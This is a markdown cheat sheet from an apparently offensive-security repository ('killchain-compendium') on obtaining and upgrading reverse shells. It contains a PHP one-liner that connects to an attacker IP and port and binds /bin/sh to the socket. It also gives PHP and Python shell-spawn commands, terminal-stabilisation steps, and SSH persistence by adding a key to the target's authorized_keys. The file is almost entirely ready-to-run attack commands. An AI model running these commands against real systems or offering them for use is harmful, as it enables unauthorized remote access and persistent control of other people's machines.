whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/reverse_shells/docs/shell_collection.md

32 lines
525 B
Markdown
Raw Blame History

# Upgrade Reverse Shell
## Via interpreter
### PHP
* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";'
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```
### Python
```python
python -c 'import pty; pty.spawn("/bin/bash")'
```
## Next
1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export TERM=xterm`
## Via SSH
* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target
Reference in New Issue View Git Blame Copy Permalink